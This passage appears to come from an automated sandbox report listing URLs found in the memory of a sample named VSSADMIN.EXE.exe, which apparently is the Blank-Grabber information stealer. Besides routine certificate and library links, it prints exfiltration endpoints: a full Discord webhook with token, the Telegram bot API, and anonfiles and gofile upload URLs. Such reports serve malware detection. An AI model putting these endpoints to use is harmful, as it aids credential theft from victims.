              Source: VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244345388.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CCC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/mail/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CBB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244259837.0000014C6CFED000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244863597.0000014C6CFEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: powershell.exe, 00000008.00000002.203170941.000001961006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA2F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.200799345.0000019600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB92EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D5F4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: VSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192742374.0000014C6D005000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245103939.0000014C6D29B000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192683834.0000014C6D29E000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192750598.0000014C6D280000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192683834.0000014C6D250000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244150450.0000014C6D29B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: VSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoftDOWNLO~1JSOy.0
Source: VSSADMIN.EXE.exe, 00000001.00000003.244345388.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoftESSAG~1.JSOy.0
Source: VSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.anonfiles.com/upload
Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.anonfiles.com/uploadr
Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.gofile.io/getServer
Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.gofile.io/getServerr
Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: VSSADMIN.EXE.exe, 00000001.00000002.245250730.0000014C6D658000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://blank-2MD3E.in
Source: VSSADMIN.EXE.exe, 00000001.00000003.192780632.0000014C6CC94000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192761325.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192563442.0000014C6CC94000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192539784.0000014C6CCF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bugs.python.org/issue42195.
Source: VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1125126396101021879/1152337129716842596/Blank-user.rar
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/cps0%
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/rpa0
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/rpa0.
Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/v9/users/
Source: VSSADMIN.EXE.exe, 00000001.00000002.245142886.0000014C6D3F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v
Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://discordapp.com/api/v9/users/
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192490005.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192251935.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190636870.0000014C6CC70000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192761325.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191866250.0000014C6CC6F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192002784.0000014C6CC6A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191661797.0000014C6CC6A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190589554.0000014C6CC70000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191646152.0000014C6CBE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: VSSADMIN.EXE.exe, 00000001.00000003.244243794.0000014C6D092000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dotnet.micr
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: VSSADMIN.EXE.exe, 00000001.00000002.245121622.0000014C6D2C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
Source: VSSADMIN.EXE.exe, 00000001.00000003.191981255.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191835270.0000014C6CD0E000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191900080.0000014C6D2C9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192066107.0000014C6CD05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244623924.0000014C6C608000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2168
Source: VSSADMIN.EXE.exe, 00000001.00000002.245121622.0000014C6D2C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2680
